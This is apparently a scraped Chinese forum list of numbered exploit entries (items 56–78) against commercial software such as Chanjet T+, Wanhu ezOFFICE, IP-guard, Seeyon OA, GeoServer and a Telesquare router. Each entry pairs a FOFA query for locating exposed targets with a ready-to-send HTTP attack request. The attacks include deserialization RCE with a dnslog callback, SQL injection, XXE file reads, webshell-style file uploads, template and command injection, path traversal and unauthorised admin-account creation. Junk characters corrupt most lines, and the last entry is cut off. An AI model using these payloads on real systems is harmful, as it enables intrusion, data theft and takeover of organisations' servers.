9 k/ ^6 p& t1 ?" H/ V9 f- I( C) Z+ r( O0 i
56. 畅捷通T+ RRATableController,Ufida.T.DI.UIP.ashx 反序列化RCE
g) [4 y& A. R; q g( b4 EFOFA: app="畅捷通-TPlus"
& s+ e3 q5 h: c( f7 Y/ q( PPOST /tplus/ajaxpro/Ufida.T.DI.UIP.RRA.RRATableController,Ufida.T.DI.UIP.ashx?method=GetStoreWarehouseByStore HTTP/1.1
* k$ ^7 G2 }, R* l5 n! XHost: x.x.x.x
o7 _. V4 I1 HUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
. D& {$ L( [! r, x1 \Content-Type: application/json
5 M. b. j# W* o
4 Y6 R) A/ t* T& G, q' P- Y0 O{# H% |5 f8 y d, H7 R& ?
"storeID":{
$ d3 e \/ z9 ~# ]! J "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",9 B+ t6 a8 Q( a1 M( O3 U
"MethodName":"Start", c/ [9 u( c0 k) e2 R( G! i7 l
"ObjectInstance":{+ n, D1 l3 k! S4 p# s9 R, x
"__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
6 _3 E y( _1 | "StartInfo": {
+ C9 c/ L$ C/ H3 H& e+ @ "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
1 @: N: l: n7 u0 k# S5 o- ~ "FileName":"cmd", "Arguments":"/c ping 6qevyvmi.dnslog.pw"
. f( \% H* Z# a+ S+ ? }0 L6 \# k; ]4 X( F/ f
}
- s- f6 D% G$ V' f/ _ }* e( L; J. n4 z7 |# K8 m
}& p: V E8 U9 U3 |. a6 L
9 }6 P8 E' E' J5 g8 H% B
6 S. @( E& N+ }8 k; _' t' ?' c* r57. 畅捷通T+ keyEdit.aspx SQL注入
! e1 \. d# b! jFOFA:app="畅捷通-TPlus"
. ~2 G2 D5 N$ C: P$ K. vGET /tplus/UFAQD/keyEdit.aspx?KeyID=1%27%20and%201=(select%20@@version)%20--&preload=1 HTTP/1.1
0 C4 x& x4 Z) w* `1 U ?- xHost: host' B2 z/ Z# _* E# c
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36' c' n; d) W7 h6 {0 @% U
Accept-Charset: utf-8
! m! S9 G/ q1 s& HAccept-Encoding: gzip, deflate6 d3 g9 {; z2 @" |$ K
Connection: close3 o: ~' q0 @+ {. D
& R1 W+ w. v; ?7 H: R
8 x" P6 t) ?9 E, A3 S. \- `6 S58. 畅捷通T+ KeyInfoList.aspx sql注入* v v! g- _( h) q' v/ P y& z0 i; {
FOFA:app="畅捷通-TPlus"* d) d& w4 C3 f8 p# A4 b0 U i& Z
GET /tplus/UFAQD/KeyInfoList.aspx?preload=1&zt=')AND+1+IN+(SELECT+sys.fn_varbintohexstr(hashbytes('MD5','123456')))--+ HTTP/1.1 w9 O* i- U4 S; w
Host: your-ip
. `2 K; H2 n" C, w: t" BUser-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
# W! O. H/ N' k8 b4 rAccept-Charset: utf-8
" G! Q; H" g4 uAccept-Encoding: gzip, deflate
! c0 e2 t& J: X; mConnection: close4 O* s9 L- ]2 k. A8 @( e" a
: |9 K/ ~- P3 d; N- X( Q
, g# H+ O- t' ^$ G7 _3 l b2 \59. XETUX 软件 dynamiccontent.properties.xhtml 远程代码执行 \/ p$ F4 ]) H1 J1 x0 \
FOFA: title="@XETUX" && title="XPOS" && body="BackEnd"
% d7 s# n! f' Y4 R' o- e* w3 pPOST /xc-one-pos/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1/ K- M: Y" p% K+ U, }( P+ v
Host: 192.168.86.128:9090/ F+ V% [+ [5 b0 x% q% Z
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
3 l6 d3 r8 k* e, H" GConnection: close% X: d! k0 I! l8 j, h
Content-Length: 1669
& ?4 E$ V: n* S3 T+ V D$ s, R+ SAccept: */*
8 X: ^& N, R/ Y2 O* s- aAccept-Language: en6 K' n; j3 b0 I: I& m
Content-Type: application/x-www-form-urlencoded% y2 ?) Z/ p; {
Accept-Encoding: gzip
$ i/ M: g& M4 {+ A J# w4 [1 k# O) W/ N1 e6 P, ]3 K2 P. o3 J
PAYLOAD$ M! W9 {/ n4 @/ G8 H* y. @0 R
' q# ~1 _) P9 F6 h# o
' v+ t1 Q0 ^6 E' H8 V
60. 百卓Smart管理平台 importexport.php SQL注入
0 }: h. @5 M5 a7 f; iFOFA:title="Smart管理平台"# X1 z: c' @; q# g% g- v3 W% Y
GET /importexport.php?sql=c2VsZWN0IDEsdXNlcigpLDM=&type=exportexcelbysql HTTP/1.1
+ \: }( w+ n# v5 y1 |! A( aHost:
1 n5 o8 } a; B" F( ~User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.362 J6 {& Z& V% m! N- Z5 f9 [& P& k
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.72 P2 n H+ d" |' N$ `: c. s* f
Accept-Encoding: gzip, deflate
/ C7 S/ Y; r2 ~/ A {) |! i) `9 NAccept-Language: zh-CN,zh;q=0.9 ]" v; {9 P/ ^) Z% d# H) R1 i5 C
Connection: close
' @5 b3 `0 t. ]+ L1 v% X9 D8 i5 B$ }) y8 `
! k% x9 c) n& Y3 T
61. 浙大恩特客户资源管理系统 fileupload 任意文件上传
* T4 }1 b# C, cFOFA: title="欢迎使用浙大恩特客户资源管理系统"8 n/ r3 |: e- K
POST /entsoft_en/entereditor/jsp/fileupload.jsp?filename=8uxssX66eqrqtKObcVa0kid98xa.jsp HTTP/1.1# F: f9 F8 h+ D6 w& K4 g; _
Host: x.x.x.x0 a) A+ V9 }" _
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15% B& ^7 R; f; _, P& q
Connection: close
, Y) b8 T3 h5 } xContent-Length: 27
U% U& y" {3 d" S2 d" AAccept: */*1 Q) O) m ~8 s& m, {# M/ Q" {3 T* a
Accept-Encoding: gzip, deflate* U' V2 ]2 {+ D+ X, s- Y- ], `
Accept-Language: en
! E& L9 d4 ^; q" @' b( N8 E8 P% P1 OContent-Type: application/x-www-form-urlencoded
( }% N& a Z# ?) V- `( p% X
( Z3 z* |0 q9 F8uxssX66eqrqtKObcVa0kid98xa- V, S0 C; ]/ u
5 [+ x3 n6 x. z# ~. B( O) P z, H
; X3 W: D/ t4 l0 [. `
62. IP-guard WebServer 远程命令执行
& M1 b E: j5 CFOFA:"IP-guard" && icon_hash="2030860561"
4 [/ G' D$ j+ A {GET /ipg/static/appr/lib/flexpaper/php/view.php?doc=11.jpg&format=swf&isSplit=true&page=||echo+"09kdujzKJDLinkQTLfGzMMKDJ23HJ"+>09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.10 @! ~! F3 f1 w. C$ Q8 X, w9 q
Host: x.x.x.x
1 _# J9 U0 i: J1 x% @6 h9 GUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36
) S8 C4 ?! z) Q0 s# v) R- }# V! Y+ qConnection: close$ ?* X) Y7 T" ^3 h6 S
Accept: */*! Y% v: {& ]- K) G9 E& X- I
Accept-Language: en
$ @; C- g+ q, j: e( H& v* I X; tAccept-Encoding: gzip
- f6 s" K! `$ }1 W
& S4 o; B( {6 L, i0 n- ~1 I) z( I- B6 ^, a
访问
# ?/ P/ b- n" B9 L t! a, ]( d; L3 ~( {) D6 I8 o. G
GET /ipg/static/appr/lib/flexpaper/php/09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
3 T# Y. }2 q+ B: l) Y2 JHost: x.x.x.x
5 ]8 z. S1 V* q4 Q* z/ u) [& s; T
2 O2 Z3 s) @# Y! t+ u* ~& K7 ?! b: ~
63. IP-guard WebServer任意文件读取3 U% T( y e) V" ?
IP-guard < 4.82.0609.0' L; t4 I1 ~6 q
FOFA:icon_hash="2030860561"' N3 S" k" [0 O; M3 B* V
POST /ipg/appr/MApplyList/downloadFile_client/getdatarecord HTTP/1.1
! _4 Q( U+ A5 o. p7 x, U+ MHost: your-ip
}% c" F3 D7 m+ n: N7 UUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.363 }2 L( |5 r4 Z* F0 g. C1 l8 ?
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
9 y7 E% M3 T6 n2 Z0 x8 J/ |Accept-Encoding: gzip, deflate
3 J5 a6 A# S+ b/ L1 X% q. DAccept-Language: zh-CN,zh;q=0.9
9 i1 j6 c j9 y! x+ D+ d9 O+ gConnection: close
7 ~* f" r% `& x5 G! c/ J7 }Content-Type: application/x-www-form-urlencoded: ~& m* b/ `7 A; H) P0 p& t
; J. V; U- P% @3 F+ D& O2 dpath=..%2Fconfig.ini&filename=1&action=download&hidGuid=1v%0D%0A( M1 [! z( V) f+ E1 L1 z
/ m$ N+ _8 g, y7 P/ C" h
64. 捷诚管理信息系统CWSFinanceCommon SQL注入
1 L% g4 b+ X- Z' c" v, i% S( y9 n. XFOFA:body="/Scripts/EnjoyMsg.js"6 s+ M6 d8 R: s) \ v {
POST /EnjoyRMIS_WS/WS/APS/CWSFinanceCommon.asmx HTTP/1.14 P @0 ~6 G7 T) M V& I
Host: 192.168.86.128:90018 m' w- e: f. V
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.363 n- i# ~! X3 l& j& U$ \# W
Connection: close
* E. B: I& A s" i( E! ?Content-Length: 3694 B$ I1 B/ @2 ~6 T# D! J' H
Accept: */*) P5 J& ]! k8 P
Accept-Language: en
/ B8 R% `- B+ E/ |1 P6 e& j4 FContent-Type: text/xml; charset=utf-8$ k4 x( O, \# u
Accept-Encoding: gzip
3 B2 j1 B- D* A: ~
( W0 L7 r# g" u( S3 ^; ^9 r<?xml version="1.0" encoding="utf-8"?>
5 O- G- j J4 M6 l2 u& d<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">% F9 h' f/ c. ^ j
<soap:Body>
7 t) L4 X: X2 P2 J7 N$ V8 c( b) [ <GetOSpById xmlns="http://tempuri.org/">: K4 |/ ^8 ?: X# C. M4 O% D
<sId>1';waitfor delay '0:0:5'--+</sId>1 z T( J. r+ l) n' C3 t) ]. n
</GetOSpById>
' a/ H0 G' w( s' _ </soap:Body>8 v* R- @% W1 g1 {( B0 S' h
</soap:Envelope>: J& [" v* R: }/ B: S
6 Q) n; ?" X$ W2 l0 j
9 F; q G' i& _; I- h/ m65. 优卡特脸爱云一脸通智慧管理平台1.0.55.0.0.1权限绕过% v* ^, B% ]9 _
FOFA:title="欢迎使用脸爱云 一脸通智慧管理平台"
) l4 ^1 ?! \# f9 I/ G3 P# w5 u响应200即成功创建账号test123456/123456' U! `( B4 a: @ e5 w t6 {4 [9 A
POST /SystemMng.ashx HTTP/1.1
) U- L" y# H3 n" W' kHost:
! r T y6 X! ~# d2 rUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)# ^1 k& l% O0 a
Accept-Encoding: gzip, deflate
7 h2 @ V$ p2 eAccept: */*
0 e6 S0 E. @6 rConnection: close: m2 f0 _- h0 l- L5 _
Accept-Language: en. J5 ?( T- P5 S/ I6 b
Content-Length: 174, O* O/ A5 Q6 b' q' ~% U3 _
2 S! o% |8 G; t! g1 \, GoperatorName=test123456&operatorPwd=123456&operpassword=123456&operatorRole=00&visible_jh=%E8%AF%B7%E9%80%89%E6%8B%A9&visible_dorm=%E8%AF%B7%E9%80%89%E6%8B%A9&funcName=addOperators6 g" R$ P# C A
+ ?. J4 U6 b2 N7 L$ h
; M4 ]( Z+ H+ z F
66. 万户ezOFFICE协同管理平台SendFileCheckTemplateEdit-SQL注入
; b8 E9 Z4 Z+ C; a7 |FOFA:app="万户ezOFFICE协同管理平台", T$ L; }5 o" J
, ~) t9 i: W$ w. T
GET /defaultroot/public/iWebOfficeSign/Template/SendFileCheckTemplateEdit.jsp?RecordID=1'%20UNION%20ALL%20SELECT%20sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%27102103122%27))%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL-- HTTP/1.1
# T8 C3 K& c5 i* G; t! {* WHost: x.x.x.x: i8 ~) V/ {: v- T3 E
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
+ k+ e/ @& }# |0 G" HConnection: close+ y4 o/ d j& l( Z- {1 o+ B
Accept: */*
/ d' [, F$ J9 E# D. }Accept-Language: en
) i% n/ E2 j6 j$ ?& E, v, s& dAccept-Encoding: gzip
% L' ?4 P1 }2 w/ j( l3 l$ d" ?2 Y" h
- \) K& z* U$ F W5 \2 q1 p第42,43行包含6cfe798ba8e5b85feb50164c59f4bec9字符串证明漏洞存在
% r5 R4 w4 i9 a4 H- |# e, u8 f( v& }; \! L* t5 r
67. 万户ezOFFICE wpsservlet任意文件上传
! g& Z: Y0 j# Z: d8 h4 C. B3 _FOFA:app="万户网络-ezOFFICE"" I7 y3 \ i' f, L
newdocId和filename参数表示写入文件名称,dir参数表示写入文件的路径,fileType参数表示文件类型8 Q0 r' c' w$ ]; T' o& X/ k
POST /defaultroot/wpsservlet?option=saveNewFile&newdocId=apoxkq&dir=../platform/portal/layout/&fileType=.jsp HTTP/1.1
" M* o: H- N0 I$ Z( M0 I, h: PHost: x.x.x.x' z3 a' u3 J0 t; d! E% X
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0( U% c5 J& B) D, V
Content-Length: 173
# I5 s3 y+ }' t! {9 pAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8& ^! }6 v- R+ \5 K# c: H
Accept-Encoding: gzip, deflate+ N* e1 f6 \/ p- q6 G
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.37 i! }# o. `& n' s K0 Q
Connection: close
3 e1 C" _/ g9 \2 t+ T/ JContent-Type: multipart/form-data; boundary=ufuadpxathqvxfqnuyuqaozvseiueerp
0 _4 n4 b, D9 d( t7 H" FDNT: 1
# s+ W( O) g! U6 I, JUpgrade-Insecure-Requests: 1
# `1 ?) `3 P& G; B( a4 l0 w, W7 A4 ~) T5 c
--ufuadpxathqvxfqnuyuqaozvseiueerp
A7 \! q9 Q4 E- |Content-Disposition: form-data; name="NewFile"; filename="apoxkq.jsp"
4 a! z5 G$ u: X$ Q* {0 ^3 Q1 |
( [+ ]% B: `0 ~7 s<% out.print("sasdfghjkj");%>
' O1 }" Q; ?3 y q% u( _9 s6 s% K# y* J--ufuadpxathqvxfqnuyuqaozvseiueerp--1 y. Y. R) a Q% ?0 e( K. x) ^ r
' w; d {- k. F) p1 A7 `
5 `* w( a5 P* }9 o' [2 N文件回显路径为/defaultroot/platform/portal/layout/apoxkq.jsp
8 C) k F v* Z' D/ |8 t7 {) `2 A, l$ [1 z0 r8 Y6 g0 V$ k* b/ h
68. 万户ezOFFICE wf_printnum.jsp SQL注入3 y% l8 y i3 L
FOFA:app="万户ezOFFICE协同管理平台"5 B: t5 G8 j% c. o( C
GET /defaultroot/platform/bpm/work_flow/operate/wf_printnum.jsp;.js?recordId=1;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
# {6 J% m4 R5 q( r* o9 DHost: {{host}}* P: g3 s' A, E
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36+ R( O$ m* E& D' U; I, U
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
% h( s) g' O2 VAccept-Encoding: gzip, deflate5 L+ }+ l! t( f8 S* r* l$ z
Accept-Language: zh-CN,zh;q=0.9! i1 S/ ^8 V! c$ g+ F- j8 A
Connection: close
: [; A9 Q/ f9 f% {: {1 w. ~& b" x
8 U) w. e4 S2 N) o8 K9 Z2 q( {8 z3 ?9 u
69. 万户 ezOFFICE contract_gd.jsp SQL注入* |. t; \$ G5 t4 |4 d0 U
FOFA:app="万户ezOFFICE协同管理平台"; r, m1 b o# Q" a
GET /defaultroot/modules/subsidiary/contract/contract_gd.jsp;.js?gd=1&gd_startUserCode=1%27%3Bwaitfor%20delay%20%270%3A0%3A5%27-- HTTP/1.1, p( x& z2 L3 r# D
Host: your-ip
# ?: s: _$ c" b! tUser-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36% N& V5 P9 g+ ?5 L% O. W' F2 `: m
Accept-Encoding: gzip, deflate9 a3 d, t3 c/ ^
Accept: */*
2 B6 F* B; J- ^Connection: keep-alive
c) k$ f# v: u: Z/ `; \0 L4 p; u( R- W/ C7 I
5 T5 ^+ j1 `4 E+ [+ K3 Y8 s5 y70. 万户ezEIP success 命令执行
8 H& L1 O& f3 ^% H2 dFOFA:app="万户网络-ezEIP"
+ s4 z; G0 v7 p8 cPOST /member/success.aspx HTTP/1.1, O2 R7 K0 a+ ]
Host: {{Hostname}}
* F& D. F Q5 S; tUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
7 x7 y1 i9 i9 a& M6 P0 s. {; KSID: dHlwZSBDOlxXaW5kb3dzXHdpbi5pbmk=
3 I$ A1 ~2 U2 }% G/ n9 fContent-Type: application/x-www-form-urlencoded
/ q! w* y f$ Y- o2 ^( yTYPE: C
8 p E: V* X! \/ I0 H- v8 x. V6 |Content-Length: 16702
$ s; `1 }' p+ j# y& A6 S& p$ l2 {8 x0 s1 x0 J9 P- q
__VIEWSTATE=PAYLOAD
3 A3 v; @! S' B% B! C6 c# {( v# }5 U9 J5 b: M( B
) D( P' m) h! U1 V71. 邦永PM2项目管理系统 Global_UserLogin.aspx SQL注入
# ]4 S" p. q; ?1 a" tFOFA:body="PM2项目管理系统BS版增强工具.zip"5 `. M) a5 e) D9 j4 h+ P7 l
GET /Global/Global_UserLogin.aspx?accId=1%27%3BWAITFOR+DELAY+%270%3A0%3A5%27--&loginCode&password&type HTTP/1.1$ S8 A2 d$ L3 z# }6 @# B
Host: x.x.x.xx.x.x.x; F. ~% n0 y( g/ }+ [4 k$ o
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36) k6 ~* r" P V0 H) {+ x5 c7 v1 z
Connection: close# K4 r- L+ `8 I* R0 A3 p
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8, K- ~; t! s( r1 {
Accept-Encoding: gzip, deflate
3 m# b) m @ J6 v5 j& K% p. UAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.22 m2 z7 j0 i; C# n
Upgrade-Insecure-Requests: 1
& B! v0 c1 }3 l% \! p3 F- w& V& m0 y& q+ u" x/ Z" [
; L6 O5 A6 F. C1 }8 q) W$ O" P
72. 致远OA getAjaxDataServlet XXE
7 `/ _2 [( v, Z3 n. w( ZFOFA:app="致远互联-OA"
0 }- ?- L9 N4 Q% ^POST /seeyon/m-signature/RunSignature/run/getAjaxDataServlet HTTP/1.13 g9 W# F7 `5 y! j
Host: 192.168.40.131:8099/ P' U6 l1 r1 t3 a c% H- W+ U
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
% m( d3 N$ @& g+ j4 VConnection: close
' ~. Z6 [$ L8 }: \3 p$ ZContent-Length: 583/ e: Q* t4 N5 g: n% `
Content-Type: application/x-www-form-urlencoded
) v. H( J9 R4 M. ?7 w. L& hAccept-Encoding: gzip
6 s. G/ T2 f3 \& G I$ m8 B
* P2 L2 W: [' T8 u" }$ t$ q. K; xS=ajaxColManager&M=colDelLock&imgvalue=lr7V9+0XCEhZ5KUijesavRASMmpz%2FJcFgNqW4G2x63IPfOy%3DYudDQ1bnHT8BLtwokmb%2Fk&signwidth=4.0&signheight=4.0&xmlValue=%3C%3Fxml+version%3D%221.0%22%3F%3E%0D%0A%3C%21DOCTYPE+foo+%5B%0D%0A++%3C%21ELEMENT+foo+ANY+%3E%0D%0A++%3C%21ENTITY+xxe+SYSTEM+%22file%3A%2F%2F%2Fc%3A%2Fwindows%2Fwin.ini%22+%3E%0D%0A%55D%3E%0D%0A%3CSignature%3E%3CField%3E%3Ca+Index%3D%22ProtectItem%22%3Etrue%3C%2Fa%3E%3Cb+Index%3D%22Caption%22%3Ecaption%3C%2Fb%3E%3Cc+Index%3D%22ID%22%3Eid%3C%2Fc%3E%3Cdd+Index%3D%22VALUE%22%3E%26xxe%3B%3C%2Fd%3E%3C%2FField%3E%3C%2FSignature%3E+ N; f {2 k5 \6 ]! V! B7 I1 b
2 ]% p. g h9 v2 z3 l
$ P6 r& f* F2 Y1 `3 w9 H
73. GeoServer wms远程代码执行
& b1 F8 m+ n& ]2 kFOFA:icon_hash=”97540678”. C1 j! N7 E8 F, T: x
POST /geoserver/wms HTTP/1.1
) o5 y# _/ s& f. J( W# |7 ?# JHost:5 T7 b0 Z+ g9 c4 Q! q s
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
4 K, F" u- E& b8 l% u% `Content-Length: 1981
% J1 Y% T8 n+ Y+ C v9 @1 OAccept-Encoding: gzip, deflate
1 i# a; M! M0 @; _- H* M" |Connection: close
; @8 s) `* O# @4 Z0 L! \- L4 VContent-Type: application/xml, x; U1 f* B( |: D5 j
SL-CE-SUID: 3
0 L- E/ l: `) O# G: I, ?5 i6 j" X1 q/ Y5 S# o0 W2 \! P {; M% @( q
PAYLOAD# D! z5 f8 S# j
7 w+ q0 w/ W5 a
; T% m7 X( E* J$ D: v( q8 `% R74. 致远M3-server 6_1sp1 反序列化RCE: z! X, M$ W8 z# b ~" w8 X
FOFA:title="M3-Server"
$ `( P# O2 w% bPAYLOAD$ [' L" b" y; C; W* f9 _
8 `7 I: p0 W/ o7 X5 S& h* @) @
75. Telesquare TLR-2005Ksh 路由器 admin.cgi RCE
5 _0 j/ m0 S2 l4 f$ fFOFA:app="TELESQUARE-TLR-2005KSH"
9 ]: m2 U+ y& Q. q2 s. KGET /cgi-bin/admin.cgi?Command=setSyncTimeHost&time=`ifconfig>test28256.txt` HTTP/1.18 J. [4 H' g5 H! g+ j+ T |2 ?
Host: x.x.x.x) j0 B( D! ?6 S/ X! j* M+ D
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
+ d8 l" r |9 s( A- {2 n% mConnection: close
0 A& `3 i8 u2 {0 v5 nAccept: */*
2 k8 \, S$ A* S; R: ~& LAccept-Language: en! H: r4 {$ E# y( c7 E! r6 C
Accept-Encoding: gzip
: P2 L( G: _/ u5 X. ?, |! J& e/ @" n8 b" g+ F
9 X# p* D( k( V+ G& s0 j6 wGET /cgi-bin/test28256.txt HTTP/1.1
6 }( f6 Z; A% }/ O& rHost: x.x.x.x1 B$ M( `* M! k: @ @$ w7 v/ w \2 K
# r3 V* B. \; B. i& [
! O' n- S( a$ C
76. 新开普掌上校园服务管理平台service.action远程命令执行
' W5 E7 R$ O& }" _. d( BFOFA:title="掌上校园服务管理平台"/ _' U9 W/ P0 {* |
POST /service_transport/service.action HTTP/1.1
' M. `* b# S$ z% WHost: x.x.x.x# w- c& {% k* H1 L
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.01 X2 T/ t9 r4 b) U. f) J
Connection: close
( Z" R @- K; eContent-Length: 211
6 {" b/ F5 M& @% `" Q6 a y8 VAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8( k2 r/ O. }; B* ?+ W
Accept-Encoding: gzip, deflate
0 F0 P- `3 G% I8 x, @Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
9 p, O0 ~8 J0 S- f% T" v8 MCookie: JSESSIONID=6A13B163B0FA9A5F8FE53D4153AC13A4
) e( p5 O/ Z( Q: eUpgrade-Insecure-Requests: 1
, u% E! A# |1 s5 w0 h+ f9 W1 d: w
{- P9 O u9 U! b! f" `
"command": "GetFZinfo",0 O! u9 Y8 q5 Y
"UnitCode": "<#assign ex = \"freemarker.template.utility.Execute\"
2 S* a' I0 j4 L' o. r ?new()>${ex(\"cmd /c echo 9d8ajikdujw8ejd9wjdfkfu8 >./webapps/ROOT/9d8ajikdujw8ejd9wjdfkfu8.txt\")}"
& y% b5 ?" W; J1 w% y}
5 m: V( H; ?* `! U8 S# x+ m1 ?( I! P; J# I1 T l$ E* {
7 T& m. D+ [0 r" b4 h! DGET /9d8ajikdujw8ejd9wjdfkfu8.txt HTTP/1.1/ B3 r2 ~; I U* {1 ]# K; i! k7 Y3 v
Host: x.x.x.x
1 |2 q* N- ?* W* u0 F6 d% z; \- u9 v8 o2 C* b3 h& T
; A, M/ z# y' I' y: ]! \& q; |$ z. R/ J9 S" M4 I
77. F22服装管理软件系统UploadHandler.ashx任意文件上传6 [9 e6 a$ B _7 D) K& V5 k/ B6 J
FOFA:body="F22WEB登陆"7 k/ T+ e4 x/ d h a, z" d
POST /CuteSoft_Client/UploadHandler.ashx HTTP/1.16 i9 l/ c- t# W8 G8 [
Host: x.x.x.x
7 Z) x( F& J% DUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
1 _+ x' H7 c. hConnection: close7 `7 Y' a6 q3 `0 n
Content-Length: 4335 w- m) C* _8 h. L' F$ q# m
Accept: */*# B1 l# v6 w4 p9 L% i$ L2 O' p7 l0 Z5 c
Accept-Encoding: gzip, deflate
- U5 s/ F6 f" f& o1 j4 ^Accept-Language: zh-CN,zh;q=0.93 ]6 z7 ]0 a2 Z- r) o
Content-Type: multipart/form-data; boundary=----------398jnjVTTlDVXHlE7yYnfwBoix
% `- r' y, v* c7 J) k! L7 z. M0 \8 R) c
------------398jnjVTTlDVXHlE7yYnfwBoix
4 l# N, C- E' X7 M) ~7 X8 LContent-Disposition: form-data; name="folder"
4 ~. T+ Q" W& ^( f* [4 V( ^
5 E7 S; W: |% W& c1 n* m; R( X/upload/udplog
* l9 c4 ]9 |& ]& E, C5 g5 {, t------------398jnjVTTlDVXHlE7yYnfwBoix4 \; I* k% N4 U! {
Content-Disposition: form-data; name="Filedata"; filename="1.aspx"
( E( }/ h( P& n7 `Content-Type: application/octet-stream$ d% a# T8 W4 j. e" [
M( A$ @! B0 I8 a0 thello1234567; Q B. L; X; b0 H3 s
------------398jnjVTTlDVXHlE7yYnfwBoix5 F8 ]8 X+ R5 C. W% k
Content-Disposition: form-data; name="Upload"
$ l+ k% d" c: l& i/ Y) e( {) }) k1 u% c* M
Submit Query
1 @, }% U* I2 c------------398jnjVTTlDVXHlE7yYnfwBoix--6 ?; R6 Q* h; I9 H4 X3 {
, B( r# _& b0 S7 i9 v1 \
; H. n6 B! d$ @8 p, B78. pkpmbs 建设工程质量监督系统 FileUpload.ashx 文件上传- K* {3 u* ~* \, G7 ^* }2 D
FOFA:icon_hash="2001627082"
$ |; b8 _% @( b5 U6 Q9 u4 b; |POST /Platform/System/FileUpload.ashx HTTP/1.1
& R' w& i7 S# |Host: x.x.x.x! P) `( X" M+ q4 A! }, ~' x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.158 X# p0 A) ?' b8 D2 q/ o, }. ~" ~
Connection: close/ i' G0 M+ D2 }1 \
Content-Length: 336
9 ^- i/ [3 n' A' bAccept-Encoding: gzip
4 X, K; Q2 _' ]Content-Type: multipart/form-data; boundary=----YsOxWxSvj1KyZow1PTsh98fdu6l" I3 }& L! B$ h8 @% F% ], Y G) o* ?
& [& Y5 ^0 M. G------YsOxWxSvj1KyZow1PTsh98fdu6l
